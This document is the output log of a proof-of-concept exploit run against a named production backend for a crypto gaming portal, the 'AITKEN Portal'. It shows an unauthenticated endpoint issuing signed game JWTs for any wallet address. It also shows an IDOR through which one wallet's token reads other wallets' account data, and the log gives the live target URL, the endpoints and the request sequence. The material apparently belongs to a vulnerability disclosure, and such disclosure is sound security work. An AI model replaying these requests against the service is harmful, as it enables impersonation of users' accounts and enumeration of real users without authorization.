
====================================================================
  F5 PoC — AITKEN Portal: Unauth Game Token + Wallet Account IDOR
====================================================================
[*] Target  : https://aitken-portal-backend-prod.lemonriver-bce807d3.koreacentral.azurecontainerapps.io
[*] Wallet A: 0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef
[*] Wallet B: 0x1111111111111111111111111111111111111111
[*] Wallet C: 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

====================================================================
  PHASE A — Confirm production environment
====================================================================
[+] API responded — fetching health to confirm env...
    environment                      Production
    version                          1.0.0.0
    timestamp                        2026-06-03T16:06:50.3422291Z
[+] CONFIRMED: this is a production system

====================================================================
  PHASE B — Issue game JWT for synthetic wallet (no auth, no signature)
====================================================================
[*] POST /api/game/launch  wallet=0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef  gameId=762058282
[*] No Authorization header. No wallet signature. No API key.

    HTTP status                      200 OK
    message (Korean→EN)              "Auth key issued"
    gameUrl                          https://universe.minini.me
[+] JWT issued for synthetic wallet with zero authentication!

====================================================================
  PHASE C — Decode JWT payload
====================================================================

  JWT Payload:
    accountId     : 79463665
    walletAddress : 0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef
    gameId        : 762058282
    type          : game_auth
    iss / aud     : Portal / PortalClient
    jti           : 571cc0ee-1dcc-49dd-9b3f-16ca9f37ee9a
    TTL remaining : 300s (~5 min)

[+] Server assigned accountId=79463665 for 0xdeadbeefdeadbeefde...
[+] walletAddress in JWT matches the attacker-supplied value — no ownership verified

====================================================================
  PHASE D — Repeat for different game ID (no rate limit)
====================================================================
[*] POST /api/game/launch  wallet=0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef  gameId=225623281
    HTTP status                      200 OK
    accountId                        79463665
    gameId                           225623281
    gameUrl                          https://red-dune-04dd2ec00.7.azurestaticapps.net
[+] Second token issued immediately — no rate limiting

====================================================================
  PHASE E — Issue tokens for two more wallets (proves any wallet is affected)
====================================================================

[*] POST /api/game/launch  wallet=0x1111111111111111111111111111111111111111
      WALLET_B accountId             102121345
      WALLET_B walletAddress         0x1111111111111111111111111111111111111111
[+]   Unique persistent accountId assigned for 0x111111111111111111...
[*] POST /api/game/launch  wallet=0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
      WALLET_C accountId             102229866
      WALLET_C walletAddress         0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[+]   Unique persistent accountId assigned for 0xaaaaaaaaaaaaaaaaaa...

[+] Each wallet gets a unique, persistent accountId in the production DB
[+] Attacker can impersonate ANY wallet's game account by calling this endpoint

====================================================================
  PHASE F — IDOR: JWT for Wallet-A reads Wallet-B and Wallet-C account data
====================================================================
[*] Using JWT issued for 0xdeadbeefdeadbeefde...
[*] Querying other wallets — server should reject if auth binding were enforced

  GET /wallet/account/0xdeadbeefdeadbeefde... (own wallet  (control))
    HTTP 200
    accountId   : 79463665
    walletAddress: 0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef
    createdAt   : 2026-06-03T15:40:23

  GET /wallet/account/0x111111111111111111... (WALLET_B    (different user))
    HTTP 200
    accountId   : 102121345
    walletAddress: 0x1111111111111111111111111111111111111111
    createdAt   : 2026-06-03T15:42:20

  GET /wallet/account/0xaaaaaaaaaaaaaaaaaa... (WALLET_C    (another user))
    HTTP 200
    accountId   : 102229866
    walletAddress: 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    createdAt   : 2026-06-03T16:06:12

[+] JWT for Wallet-A successfully read Wallet-B and Wallet-C account data
[+] IDOR confirmed: no binding between JWT walletAddress and queried address

====================================================================
  PHASE G — Production DB side-effect: accounts persist across calls
====================================================================
[*] Re-launching with WALLET_A — should return same accountId as Phase B/C
    Phase B accountId                79463665
    Phase G accountId                79463665
[+] Same accountId returned — account is PERMANENT in the prod DB
[+] Each call to /api/game/launch creates/retrieves a real production account

====================================================================
  SUMMARY — Vulnerabilities Confirmed
====================================================================

  API        : https://aitken-portal-backend-prod.lemon...
  Used by    : https://penguinbase.com (JS bundle AITKEN_PORTAL config)

  Bug 1: POST /api/game/launch — NO AUTHENTICATION
    → Issues signed JWT for any wallet address
    → Creates/retrieves permanent production DB account
    → No wallet signature, no session, no API key required
    → All 4 game IDs affected (minini-universe, SpaceJump,
      bakery-rush, gilded-dungeon)
    → No rate limiting — token refreshable instantly

  Bug 2: GET /wallet/account/{walletAddress} — IDOR
    → Any valid JWT (even from a different wallet) reads any account
    → Exposes accountId, walletAddress, createdAt for any user
    → Combined with Bug 1: zero-setup full user enumeration


